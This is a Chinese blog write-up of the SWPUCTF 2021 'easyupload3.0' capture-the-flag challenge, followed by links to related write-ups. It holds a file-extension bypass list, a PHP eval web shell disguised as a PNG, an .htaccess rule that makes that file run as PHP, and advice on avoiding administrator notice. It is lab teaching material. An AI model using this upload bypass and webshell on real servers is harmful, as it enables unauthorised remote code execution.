[SWPUCTF 2021 新生赛]easyupload3.0

最新推荐文章于 2024-03-28 22:43:05 发布
最新推荐文章于 2024-03-28 22:43:05 发布
阅读量1.1k 收藏 21
点赞数 22
分类专栏: ctf 文章标签: web安全 php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73612768/article/details/135199131
版权

[SWPUCTF 2021 新生赛]easyupload3.0 wp

信息搜集

进入页面:

在这里插入图片描述

看到提示了吗,没看到也没关系,分享一个文件给大家,用来测试 PHP 文件上传可好用了。

php 后缀名绕过.txt:

php
php2
php3
php4
php5
php6
php7
phps
phps
pht
phtm
phtml
pgif
shtml
htaccess
phar
inc
hphp
ctp
module
php%20
php%0a
php%00
php%0d%0a
php/
php.
file.png.php
png.pHp5
php#.png
php%00.png
php\x00.png
php%0a.png
php%0d%0a.png
phpJunk123png
png.jpg.php
php%00.png%00.jpg

测试后缀名

先写个马 eval.png :

BM
<script language="php">@eval($_POST['shell']);</script>

关于这个马的解释可以去看我的另一篇文章:

[极客大挑战 2019]Upload wp

抓包,送到 burp 的 intruder 模块,导入文件,攻击:

在这里插入图片描述

当看到 htaccess 后缀名没被过滤的时候,我就有想法了。

上传 .htaccess 文件

可以参考:

web配置文件.htaccess详解

.htaccess 文件是 Apache 的配置文件(注意文件名必须一模一样),其中可以设置一些规则,使得与 .htaccess 文件同目录的文件被当作 PHP 代码执行。

我们将要上传的 .htaccess 文件内容为:

<FilesMatch "eval.png">
SetHandler application/x-httpd-php
AddHandler php5-script .png
</FilesMatch>

这段代码的作用,就是使得与 .htaccess 同目录下的名为 eval.png 的文件被当成 PHP 代码执行。只设置一个文件,可以避免其他文件被误操作,当成 PHP 代码执行,在渗透测试过程中也可以减少被管理员发现的风险,是一个良好的习惯。

将此文件上传以后,再上传一个名为 eval.png 的文件,文件内容上面已经给出。

蚁剑连接

上传成功后会给出文件的路径,直接用蚁剑连接 eval.png 所在的路径即可。

http://node4.anna.nssctf.cn:xxxxx/upload/eval.png

/var/www/html/flag.php 文件中发现 flag :

在这里插入图片描述

妙尽璇机
关注
  • 22
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 | CTF】攻防世界 easyupload 解题详析
等风来
07-31 7396
抓包改后缀,.php1~.php9、.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令):提示:只要是运用了fastcgi的服务器都能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
【CTF】[SWPUCTF 2021 新生]easyupload3.0
西原一点红的博客
06-20 319
响应说明是黑名单校验尝试后缀绕过,发现行不通htaccessphpinfo里找到flag。
[SWPUCTF 2021]easyupload3.0(WP)
最新发布
wikey 的博客
03-28 212
第一行是自动查找文件并解析为php。然后打开burp抓住图片上传的数据。修改数据之后写木马并传进去。看起来跟前两次差不多捏。然后复制文件夹去蚁剑链接。老样子burp弄一下。
[SWPUCTF 2021 新生]traditional
03-15
SWPUCTF 2021 新生的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
error message_errormessage_
10-04
在IT行业中,错误处理是软件开发中的重要环节,它确保了程序在遇到问题时能够以适当的方式响应,提供用户友好的反馈。"error message_errormessage_" 这个标题可能是指一个特定的错误处理机制或者函数,其核心是创建...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1073
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
攻防世界ctf题目easyupload做题笔记。
qq_56426046的博客
08-27 4286
攻防世界ctf题目easyupload做题笔记。
[SWPUCTF 2021 新生] web
qq_61768489的博客
08-07 3542
简单来说: 检测路径中是否存在%字符,并且如果%后面的两个字符是十六进制字符,就会对后面的两个字符进行url解码转化,如路径中有%2e./,则会解码为../,转换后判断是否存在../,加入路径中使用.%2e/则能绕过,导致目录穿越漏洞,因为当遍历到第一个.时,后面两个字符是%2并不是./,就不会被处理,绕过检测。没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。...
ctf练习之Easy upload
SDM_JH的博客
08-07 2597
一、进入目标站点,查看网页源码,发现上传后缀白名单。 二、先上传一个.png的图片看看,得到提示。 三、打开burp suite,设置代理。修改上传的文件名,绕过前端限制,得到新的提示。 四、在图片内容的中间位置插入内容,得到flag ...
ctf-第五周 | Easy upload
qq_29566629的博客
02-10 705
知识点: 要成功上传才能得到提示。 filename是文件格式 Content-type 是文件类型 要求文件内容里有什么内容,可以使用burp里的repeater直接进行增删改查。
合天每周CTF之第五周-Easy upload
xxhjtc的博客
12-13 798
1.题目描述: 1).进入环境,查看页面源代码,发现限制文件格式为png,jpg,gif: 2).创建文本文档,修改格式为1.png,上传,提示图片格式不对: 3)寻找实验环境内其他图片,重新上传: 4).得到提示信息,可以得知是进行文件头检测,打开burpsuite抓包,将文件名修改为give_me_flag.php: 修改前: 修改后: 5).得到提示信息,文件内需要包含:givemeflag,将该字符串粘贴至文件内任意位置,提交得到flag: 6)fla..
攻防世界-WEB-easyupload
Lucifer的专栏
09-11 522
2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为。如图所示上传地址为:****/uploads/index.php。PS:按F12打开调试器选择网络查看上传文件的地址。1.新建.user.ini文件,内容如下。4. 新建a.txt文件,内容为。保存后将文件后缀修改为.jpg。5.直接上传该文件即可成功上传。
文件上传漏洞(buuctf极客大挑战easy upload
qq_66013948的博客
09-26 266
这个语句被过滤了,只要出现了这个语句,就会被过滤,那么我们要试着绕过这个,当然,在绕过的途中可能会遇到其他的情况,例如遇到php被过滤之类的问题,不过这是有的题目才会出现的问题了,具体的题目要具体分析,有的题目过滤的关键词是不一样的,需要利用不同的语句进行绕过。一名网安工程师,最开始学的那几个漏洞之一学就是注入类漏洞,而注入的参数可以是get /post等参数,也可以是文件;首先,打开文件后,我们就可以看到一个上传图片的一个表单。那么,我们可以试着将这个文件变为phtml格式过后试着上传一下,得到的是。
php upload ctf,强网杯CTF防御ez_upload Writeup
weixin_35645813的博客
03-17 1103
这是强网杯拟态防御线下遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,以及一些特定的符号。如果wllm中包含了这些被过滤的字符,脚本会输出"LTLT说不能用这些奇奇怪怪的符号哦!"。接着,脚本会检查wllm中是否包含字母,如果包含字母,脚本会输出"Ra's Al Ghul说不能用字母哦!"。最后,如果wllm通过了所有的过滤条件,脚本会执行eval函数来执行用户传入的代码。所以,要获取flag,需要构造一个满足所有过滤条件的有效代码。 #### 引用[.reference_title] - *1* *2* *3* [[SWPUCTF 2021 新生] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值